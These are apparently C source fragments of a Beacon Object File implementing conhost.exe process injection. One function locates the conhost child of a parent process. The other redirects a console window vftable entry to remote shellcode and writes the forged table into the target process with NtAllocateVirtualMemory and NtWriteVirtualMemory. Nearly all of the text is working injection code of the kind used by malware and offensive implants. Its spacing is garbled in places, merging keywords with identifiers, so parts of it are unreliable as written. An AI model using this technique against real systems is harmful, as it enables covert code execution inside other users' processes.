DWORDGetConhostId(DWORD dwPPid){ HANDLE hSnap =NULL; PROCESSENTRY32 pe32; DWORD dwPid =0; // Create a toolhelp snapshot hSnap = KERNEL32$CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);if(INVALID_HANDLE_VALUE == hSnap) { goto end; }intZeroMemory(&pe32,sizeof(pe32));pe32.dwSize =sizeof(PROCESSENTRY32); // Get the first processif(KERNEL32$Process32First(hSnap,&pe32)) {do { // Check current process nameif ( 0== MSVCRT$_stricmp("conhost.exe",pe32.szExeFile)) { //internal_printf("conhost.exe found with PID:%lu and PPID:%lu\n", pe32.th32ProcessID, pe32.th32ParentProcessID);
// Is this the child of our parent process?if (dwPPid ==pe32.th32ParentProcessID ) { // We found the conhost of our process // Return the process ID dwPid =pe32.th32ProcessID;break; } } } while(KERNEL32$Process32Next(hSnap,&pe32)); }end:if( (NULL!= hSnap) && (INVALID_HANDLE_VALUE != hSnap) ) { KERNEL32$CloseHandle(hSnap); hSnap =NULL; }return dwPid;}
// Update the local vftable to point to the shellcodeconsoleWindow.GetWindowHandle = (ULONG_PTR)lpRemoteShellcodeBuffer;// Allocate a remote buffer for the new vftableRegionSize =sizeof(consoleWindow) +1;dwErrorCode =NtAllocateVirtualMemory(lpProcessInfo->hProcess,&lpRemoteVTableBuffer,0,&RegionSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);if (STATUS_SUCCESS != dwErrorCode){internal_printf("NtAllocateVirtualMemory failed (%lu)\n", dwErrorCode);goto end;}// Write the local vftable to the remote bufferdwErrorCode =NtWriteVirtualMemory(lpProcessInfo->hProcess, lpRemoteVTableBuffer,&consoleWindow,sizeof(consoleWindow),&RegionSize);if ( STATUS_SUCCESS != dwErrorCode ){internal_printf("NtWriteVirtualMemory failed (%lu)\n", dwErrorCode);goto end;}// Update the remote vftable pointer to point to the new remote vftabledwErrorCode =NtWriteVirtualMemory(lpProcessInfo->hProcess, lpUserData,&lpRemoteVTableBuffer,sizeof(ULONG_PTR),&RegionSize);if ( STATUS_SUCCESS != dwErrorCode ){internal_printf("NtWriteVirtualMemory failed (%lu)\n", dwErrorCode);goto end;}